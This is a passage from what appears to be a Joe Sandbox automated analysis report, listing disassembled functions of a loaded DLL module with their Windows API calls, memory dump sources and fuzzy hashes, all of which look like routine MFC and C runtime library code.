Opcode Fuzzy Hash: 0c3e30cea5172b4b2e7922a8625d18c992065803800c063af39add1903620324
Instruction Fuzzy Hash: 66F0FE719407445BEB30BB724949B47BAD1FFC4720F16092EE2458B990DAB6E441DF40

Function 6FD0815A Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6FD0818D
GetParent.USER32(?), ref: 6FD0819B
GetParent.USER32(?), ref: 6FD081AE
GetLastActivePopup.USER32(?), ref: 6FD081BF
IsWindowEnabled.USER32(?), ref: 6FD081D3
EnableWindow.USER32(?,00000000), ref: 6FD081E6

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 984ae9a89dd9b9d27c503086bd9b126f255ee40e5808255051ff3a5a48e8d7c9
Instruction ID: 9a2f188a32a7e201a091a26ee8005258014a643103e84390e49e779601ce8ead
Opcode Fuzzy Hash: 984ae9a89dd9b9d27c503086bd9b126f255ee40e5808255051ff3a5a48e8d7c9
Instruction Fuzzy Hash: 7C11943360DB21EBE7913F698D80B9A76A8AF45B60F090116ED14EB240DB60F801C6D7

Function 6FD1C416 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6FD1C43E

Part of subcall function 6FD14FC4: __getptd.LIBCMT ref: 6FD14FD2
Part of subcall function 6FD14FC4: __getptd.LIBCMT ref: 6FD14FE0

__getptd.LIBCMT ref: 6FD1C448

Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F

__getptd.LIBCMT ref: 6FD1C456
__getptd.LIBCMT ref: 6FD1C464
__getptd.LIBCMT ref: 6FD1C46F
_CallCatchBlock2.LIBCMT ref: 6FD1C495

Part of subcall function 6FD15069: __CallSettingFrame@12.LIBCMT ref: 6FD150B5

Part of subcall function 6FD1C53C: __getptd.LIBCMT ref: 6FD1C54B
Part of subcall function 6FD1C53C: __getptd.LIBCMT ref: 6FD1C559

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 4e54fc789c35e758ad6fb7f9b61c28a05e1a607a8f707d907668120aa7820e72
Instruction ID: 2f79691e9f5e462525073f3a5257e1ca18991b0cd8b2bc87b365ca7f032a2ad9
Opcode Fuzzy Hash: 4e54fc789c35e758ad6fb7f9b61c28a05e1a607a8f707d907668120aa7820e72
Instruction Fuzzy Hash: 1311B2B1808309DFDF40DFA4E944AED7BB1BB18318F148569E814A7290EB39AA159B60

Function 6FD0DB5C Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 6FD0DB6D
GetDlgCtrlID.USER32(00000000), ref: 6FD0DB81
GetWindowLongW.USER32(00000000,000000F0), ref: 6FD0DB91
GetWindowRect.USER32(00000000,?), ref: 6FD0DBA3
PtInRect.USER32(?,?,?), ref: 6FD0DBB3
GetWindow.USER32(?,00000005), ref: 6FD0DBC0

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 9bbfd1e9cd8f53a1424a165eed4691eb23b98c1c7f367ef61fd7631bd5e21f42
Instruction ID: f938a073a5bc284f6de4d42ebdca022460bc28ab8b87c6570bd20eac0788ed6a
Opcode Fuzzy Hash: 9bbfd1e9cd8f53a1424a165eed4691eb23b98c1c7f367ef61fd7631bd5e21f42
Instruction Fuzzy Hash: 0B012836104519ABEB517F648C48EAE3B7AEF46360B084122FA11E6090DB34F526CAE4

Function 6FD096DA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 6FD096F2
_memset.LIBCMT ref: 6FD0976A
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FD097CD
LoadBitmapW.USER32(00000000,00007FE3), ref: 6FD097E5

Strings

, xrefs: 6FD0974B

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 30109446478b14a350ab0bdee45002974b7d7e92d61d44d194ee0efe195dd5ce
Instruction ID: 015061de914e731a8ca9567bd6b051d5dd5020719f9bca2468f9f36c46aab595
Opcode Fuzzy Hash: 30109446478b14a350ab0bdee45002974b7d7e92d61d44d194ee0efe195dd5ce
Instruction Fuzzy Hash: 12310572A00359DBEF209F288CC4B997BB5FB85354F5540A6E649EB2C1DF30B9858F60

Function 6FD1C165 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FD1C17F

Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F

__getptd.LIBCMT ref: 6FD1C190
__getptd.LIBCMT ref: 6FD1C19E

Strings

MOC, xrefs: 6FD1C171
csm, xrefs: 6FD1C178

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
Instruction ID: 898a22dfb52825927d90ac8e0cc1272c17df05e468f5657b267a0540593ba305
Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
Instruction Fuzzy Hash: DBE04F3655C348CFE780DBB4E046B9837A4EB69318F1501F1D40CCB261D735F584D952

Function 6FD05670 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,6FD049D6,?,00000003), ref: 6FD05685
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FD056B4
GetLastError.KERNEL32 ref: 6FD056C5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FD056E5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FD05709

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: 7c810c3e47cb89bd09c08a4ec0705ea6b6d634a70f8b517a77f5a33592b4d9b6
Instruction ID: ba7032564dbea18b77bcddee360f39c053c9f35070b629f8120ac208c612f2a6
Opcode Fuzzy Hash: 7c810c3e47cb89bd09c08a4ec0705ea6b6d634a70f8b517a77f5a33592b4d9b6
Instruction Fuzzy Hash: 86117F75384305ABE660EF68DCC5F6777ACEB85754F200929FA41972C0DA64BC098774

Function 6FD0DA11 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 6FD0DA3D
_memset.LIBCMT ref: 6FD0DA5B
GetWindowTextW.USER32(00000000,?,00000100), ref: 6FD0DA75
lstrcmpW.KERNEL32(?,?,?,?), ref: 6FD0DA87
SetWindowTextW.USER32(00000000,?), ref: 6FD0DA93

Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: b9789897c9f1e776ec03849be6d124385a0a786697be7934fd3a5e99b2327d41
Instruction ID: 1e64ade53325632d4d2a32ade01619800b972efea18c0ccf2c554a18bb445bcd
Opcode Fuzzy Hash: b9789897c9f1e776ec03849be6d124385a0a786697be7934fd3a5e99b2327d41
Instruction Fuzzy Hash: 0F01C4B6504319A7DB40EF648C8899FB3AEEF45310F044467FA05D3141DF34F90487A0

Function 6FD1FE0E Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FD1FE1A

Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F

__amsg_exit.LIBCMT ref: 6FD1FE3A
__lock.LIBCMT ref: 6FD1FE4A
InterlockedDecrement.KERNEL32(?), ref: 6FD1FE67
InterlockedIncrement.KERNEL32(02931608), ref: 6FD1FE92

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 032d92c7363854181c96037af80c99da8108261efab6c9f935abdc54614f41e1
Instruction ID: f366c93e32d7bde19a66250fdc45a4fc80347eddbc65c4497d82d2157c3a170c
Opcode Fuzzy Hash: 032d92c7363854181c96037af80c99da8108261efab6c9f935abdc54614f41e1
Instruction Fuzzy Hash: 7B01D633E0DB21DBEB91DBA8A80478F77A0AF4A739F04010AD954A72C1CB35B551CBE1

Function 6FD14618 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 6FD14636

Part of subcall function 6FD1A914: __mtinitlocknum.LIBCMT ref: 6FD1A92A
Part of subcall function 6FD1A914: __amsg_exit.LIBCMT ref: 6FD1A936
Part of subcall function 6FD1A914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6FD1A93E

___sbh_find_block.LIBCMT ref: 6FD14641
___sbh_free_block.LIBCMT ref: 6FD14650
HeapFree.KERNEL32(00000000,00000000,6FD2E828,0000000C,6FD1A270,00000000,?,6FD1A5D4,00000000,00000001,00000000,?,6FD1A89E,00000018,6FD2E978,0000000C), ref: 6FD14680
GetLastError.KERNEL32(?,6FD1A5D4,00000000,00000001,00000000,?,6FD1A89E,00000018,6FD2E978,0000000C,6FD1A92F,00000000,00000000,?,6FD1A32A,0000000D), ref: 6FD14691

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: ad0788b33b668eccd1dd9060ae8e4a69fa6bf4352a286cb62ff739d4b0c04445
Instruction ID: 690dafb694f2c04f5551565d4936bd858e279b8d96b4569f72c010b25c9157fc
Opcode Fuzzy Hash: ad0788b33b668eccd1dd9060ae8e4a69fa6bf4352a286cb62ff739d4b0c04445
Instruction Fuzzy Hash: B501627280DB15EBEFA0DFB4B80479D3B64AF0377EF644109E114AA0C0CB79B5508AA4

Function 6FD0C113 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsFree.KERNEL32(?,?,?,6FD0C179), ref: 6FD0C13B
GlobalHandle.KERNEL32(?), ref: 6FD0C149
GlobalUnlock.KERNEL32(00000000), ref: 6FD0C152
GlobalFree.KERNEL32(00000000), ref: 6FD0C159
RtlDeleteCriticalSection.NTDLL ref: 6FD0C163

Part of subcall function 6FD0BF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6FD0BFBC
Part of subcall function 6FD0BF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BFCC
Part of subcall function 6FD0BF5D: LocalFree.KERNEL32(?), ref: 6FD0BFD5
Part of subcall function 6FD0BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FD0BFE7

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: 67c13714a71982bcaf3edc557702a367aba0a14576516303d68c68223120a88e
Instruction ID: ae7970f38021036c141d8526f91687fdff4bb60bb65d49814cface6e150c410c
Opcode Fuzzy Hash: 67c13714a71982bcaf3edc557702a367aba0a14576516303d68c68223120a88e
Instruction Fuzzy Hash: 4CF05437604B00DBEA516F389C48E5A36B99F86670719061AF625D7280CF30F81387B1

Function 6FD1140F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6FD0C220: RtlEnterCriticalSection.NTDLL(6FD334A8), ref: 6FD0C25A
Part of subcall function 6FD0C220: RtlInitializeCriticalSection.NTDLL(?), ref: 6FD0C26C
Part of subcall function 6FD0C220: RtlLeaveCriticalSection.NTDLL(6FD334A8), ref: 6FD0C279
Part of subcall function 6FD0C220: RtlEnterCriticalSection.NTDLL(?), ref: 6FD0C289

Part of subcall function 6FD0BB0C: __EH_prolog3_catch.LIBCMT ref: 6FD0BB13

Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FD11458
FreeLibrary.KERNEL32(?), ref: 6FD11468

Strings

HtmlHelpW, xrefs: 6FD11452
hhctrl.ocx, xrefs: 6FD1143C

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpW$hhctrl.ocx
API String ID: 2853499158-3773518134
Opcode ID: 35e137d2eac3e666f3be00c0bad0fb09dbe232ae0ef8a8f40640d241e6d01749
Instruction ID: 7d35b6536b802529123816921771650122ea4f878217eb130d47a368b7fe9d21
Opcode Fuzzy Hash: 35e137d2eac3e666f3be00c0bad0fb09dbe232ae0ef8a8f40640d241e6d01749
Instruction Fuzzy Hash: 1501D632508716E7D7A1AFB4DD04B4A3BE8AF04768F00C515F58A95590CB71F460D661

Function 6FD1C7C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6FD1C7D6

Part of subcall function 6FD1C731: ___BuildCatchObjectHelper.LIBCMT ref: 6FD1C767

_UnwindNestedFrames.LIBCMT ref: 6FD1C7ED
___FrameUnwindToState.LIBCMT ref: 6FD1C7FB

Strings

csm, xrefs: 6FD1C7D2, 6FD1C7E7, 6FD1C7FA, 6FD1C818, 6FD1C828

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction ID: 1471fb76e14a713367d0cfdf0a8d5085f62b130e9ce020fc0ef7904660abc572
Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction Fuzzy Hash: BB01E472048209BBDF529F51ED84EEA7F6AFF09358F104021BD1865160D772F9B1EBA1

Function 6FD1ED77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,6FD177D7), ref: 6FD1ED7C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FD1ED8C

Strings

KERNEL32, xrefs: 6FD1ED77
IsProcessorFeaturePresent, xrefs: 6FD1ED86

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 65d3f4d043dcb9acd36953a8ab5f592aa7e6f58c5d74f4c3837fd3f0229799c5
Instruction ID: 6f47e9fc839640dd8f2a924f5d7b322697102658e0cec3e4b4a1d821b85066c4
Opcode Fuzzy Hash: 65d3f4d043dcb9acd36953a8ab5f592aa7e6f58c5d74f4c3837fd3f0229799c5
Instruction Fuzzy Hash: 31F03031904E0DD3EF405BB1AD1A7AF7A79FB82756F860991E296A1084DF31B0B4D385

Function 6FD07D71 Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FD07D88
GetFileTime.KERNEL32(?,?,?,?), ref: 6FD07DBF
GetFileSizeEx.KERNEL32(?,?), ref: 6FD07DD7

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: File$SizeTime_memset
String ID:
API String ID: 151880914-0
Opcode ID: 70e845391768a64e61e19b588a58687f2701095939fa9f6a031c565ec1295720
Instruction ID: 83f61cba81ebba099b8ff3dc42b859751c5f9f2d896e6f742275a6e6d9e86e53
Opcode Fuzzy Hash: 70e845391768a64e61e19b588a58687f2701095939fa9f6a031c565ec1295720
Instruction Fuzzy Hash: 48510B76904705EFDB60DF68C94499AB7F8FF09320B108A2EE5A6D7690E734F944CB60

Function 6FD2081B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FD2084F
__isleadbyte_l.LIBCMT ref: 6FD20883
MultiByteToWideChar.KERNEL32(00000080,00000009,6FD140D8,6FD2BF84,00000000,00000000,?,?,?,?,6FD140D8,00000000,?), ref: 6FD208B4
MultiByteToWideChar.KERNEL32(00000080,00000009,6FD140D8,00000001,00000000,00000000,?,?,?,?,6FD140D8,00000000,?), ref: 6FD20922

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f6abcdde93470d03580d21a4ec8a847d15daf435538ba5cd7efc89021b1c1009
Instruction ID: 4962987ef52219969b345b2501e7a40744b6daa8f77e30eaf505fb9d194554ae
Opcode Fuzzy Hash: f6abcdde93470d03580d21a4ec8a847d15daf435538ba5cd7efc89021b1c1009
Instruction Fuzzy Hash: 0331B131904345EFEB40EF64C8A8AAFBBF5AF05398B04856AE6659B091D730F940DBD0

Function 6FD088C8 Relevance: 6.1, APIs: 4, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 6FD088E7
lstrcmpW.KERNEL32(00000000,?), ref: 6FD088F4
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FD0892E
GlobalLock.KERNEL32(00000000), ref: 6FD08938

Part of subcall function 6FD0DAD1: GlobalFlags.KERNEL32(?), ref: 6FD0DAE0
Part of subcall function 6FD0DAD1: GlobalUnlock.KERNEL32(?), ref: 6FD0DAF2
Part of subcall function 6FD0DAD1: GlobalFree.KERNEL32(?), ref: 6FD0DAFD

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
String ID:
API String ID: 2391069079-0
Opcode ID: 84bb4440647b5a2b9cb1bdd990ac20cc653a0f1149dc5d62f503ce87b34390c7
Instruction ID: c76c66afa0c0dde7a4ffac7f49e06fb68d68ada123baf6c9551141f500ff48b1
Opcode Fuzzy Hash: 84bb4440647b5a2b9cb1bdd990ac20cc653a0f1149dc5d62f503ce87b34390c7
Instruction Fuzzy Hash: D7115872904A04BADF52AFA5CC48DAF7AEEFB85705B00041AFA0296060DB32E910D770

Function 6FD0BF5D Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 6FD0BFBC
RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BFCC
